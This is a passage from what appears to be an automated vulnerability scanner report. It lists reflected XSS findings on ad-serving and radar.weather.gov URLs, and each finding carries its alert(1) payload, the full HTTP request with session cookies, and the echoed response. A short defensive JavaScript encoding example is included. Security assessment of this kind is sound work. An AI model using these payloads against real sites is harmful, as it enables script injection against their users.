document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAA
...[SNIP]...
CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.8dd65'-alert(1)-'9350f9133f9/referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEE
...[SNIP]...

2.93. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c43'%3balert(1)//bb09889184a was submitted in the redir parameter. This input was echoed as f9c43';alert(1)//bb09889184a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-45954758_1304955419,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-45954758_1304955419%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D310802%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3Ff9c43'%3balert(1)//bb09889184a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwzJSg7gQQzJSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb681375=5_[r^kI/7Zw[-!!0nf8MPcQ6y?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP7g4Zc5yxUl_SsYda6b2ziVMCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAlg8BAgUCAAUAAAAAxiWa4gAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955460%29%3Buf%28%27c%27%2C+61473%2C+1304955460%29%3Buf%28%27r%27%2C+272040%2C+1304955460%29%3Bppv%287166%2C+%279172079212996409528%27%2C+1304955460%2C+1336491460%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:48 GMT
Content-Length: 729

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...
310802;contx=weath;an=40;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=[timestamp]?f9c43';alert(1)//bb09889184a">
...[SNIP]...

2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61f30'-alert(1)-'6f7e06a5860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rub_usatoday61f30'-alert(1)-'6f7e06a5860/;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=310802;cmpgurl=http%253A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:07 GMT
Connection: close
Set-Cookie: mmpg=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:37:07 GMT
Content-Length: 8102

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-87265582_1304955427","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rub_usatoday61f30'-alert(1)-'6f7e06a5860&size=728x90&imp_id=cm-87265582_1304955427,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.n
...[SNIP]...

2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad9d8"><script>alert(1)</script>e5caccb3aa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14139
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0">
...[SNIP]...

2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8d560<script>alert(1)</script>b7ea99d8653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/images/8d560<script>alert(1)</script>b7ea99d8653 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14127
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/Conus/images/8d560<script>alert(1)</script>b7ea99d8653</b>
...[SNIP]...

2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a3aa<script>alert(1)</script>141b81665a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus7a3aa<script>alert(1)</script>141b81665a4/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14149
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/Conus7a3aa<script>alert(1)</script>141b81665a4/index.php</b>
...[SNIP]...

2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30135'><a>4523c2d38fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Conus30135'><a>4523c2d38fe/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 13944
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<a href='http://radar.weather.gov/Conus30135'><a>4523c2d38fe'>
...[SNIP]...

2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9caa"><script>alert(1)</script>21f22c9fe5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conuse9caa"><script>alert(1)</script>21f22c9fe5f/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14163
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conuse9caa"><script>alert(1)</script>21f22c9fe5f/index.php">
...[SNIP]...

2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998aa"><script>alert(1)</script>932b00c7820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/998aa"><script>alert(1)</script>932b00c7820 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14067
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conus/998aa"><script>alert(1)</script>932b00c7820">
...[SNIP]...

2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9220f"><script>alert(1)</script>9368837639a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/9220f"><script>alert(1)</script>9368837639a HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 15248
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/images/9220f"><script>alert(1)</script>9368837639a">
...[SNIP]...

2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d22b5<script>alert(1)</script>e731b910b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/d22b5<script>alert(1)</script>e731b910b3 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 15232
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/images/d22b5<script>alert(1)</script>e731b910b3</b>
...[SNIP]...

2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d24f"><script>alert(1)</script>beb2182b5f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6d24f"><script>alert(1)</script>beb2182b5f0?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14136
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/6d24f"><script>alert(1)</script>beb2182b5f0?rid=hdx&product=N0R&overlay=11101111&loop=no">
...[SNIP]...
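
The radar.weather.gov findings above all share one sink: the requested URL is echoed on the 404 page, once inside a double-quoted value="..." attribute and once as text inside <b>...</b>, with no encoding. The following is an added example, not code from the report, from radar.weather.gov or from localadbuy.com, showing the vulnerable rendering beside a hardened one that encodes for each context, plus the stricter encoder needed where an attribute is left unquoted (as the scanner flags for the sitelife.usatoday.com findings later in this report). Function names and the tag-counting check are assumptions made for the demonstration; the sample URL is the decoded payload from finding 2.95. Runs under Node.js with no dependencies.

```javascript
// Added example (not code from radar.weather.gov or localadbuy.com): a 404
// page that echoes the requested URL, as the responses in this report do,
// rendered with encoding that matches each context the value lands in.
// Node.js, no dependencies.

// Encodes the five characters that can change meaning in HTML text or inside
// a quoted attribute value. Sufficient only while the attribute stays quoted.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// For an attribute that is not quoted, whitespace, '=', '`' and anything else
// that ends a token must be escaped as well. Escaping every non-alphanumeric
// code point is the simplest rule that is safe there; better still, quote.
function encodeHtmlUnquotedAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) =>
    '&#x' + c.codePointAt(0).toString(16) + ';');
}

// Vulnerable: the raw URL goes into a quoted attribute and a text node,
// exactly the two sinks shown in the radar.weather.gov responses.
function render404Vulnerable(requestedUrl) {
  return '<input type="text" name="choices" size="30" value="' + requestedUrl + '">\n' +
         '<b>' + requestedUrl + '</b>';
}

// Hardened: identical markup, every interpolation encoded, attribute quoted.
function render404Hardened(requestedUrl) {
  const safe = encodeHtml(requestedUrl);
  return '<input type="text" name="choices" size="30" value="' + safe + '">\n' +
         '<b>' + safe + '</b>';
}

// Crude stand-in for a DOM parser: counts tag openers, i.e. '<' followed by
// a letter or '/'. Entity-encoded brackets do not count, so the result is the
// number of tags the page author wrote, not what the attacker added.
function countTags(html) {
  return (html.match(/<[A-Za-z/]/g) || []).length;
}

// Constructed input: the URL-decoded request path from finding 2.95.
const PAYLOAD_URL =
  'http://radar.weather.gov/Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0';

function demo() {
  return {
    vulnerableTags: countTags(render404Vulnerable(PAYLOAD_URL)),
    hardenedTags: countTags(render404Hardened(PAYLOAD_URL)),
    hardenedHtml: render404Hardened(PAYLOAD_URL),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

With the payload from 2.95 the vulnerable render contains seven tags (the two the template wrote plus the attacker's <script>, </script> and the closing </b> that now sits after a second script element); the hardened render contains exactly the three the template wrote. The same encodeHtml call is the fix for the localadbuy.com 404 pages that echo the path inside <pre>, since that is also a text-node context.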

2.104. http://radar.weather.gov/radar.php [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The value of the product request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e333"%3balert(1)//b50d5d274da was submitted in the product parameter. This input was echoed as 7e333";alert(1)//b50d5d274da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the response excerpt below shows the echoed value upper-cased (theProduct = "N0R7E333";ALERT(1)//B50D5D274DA";): the injected double quote does terminate the string and the // does discard the rest of the line, but ALERT is not a defined function, so this exact payload would fail with a ReferenceError at runtime. A working payload has to survive that case folding; confirm one manually before reporting the issue as exploitable.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

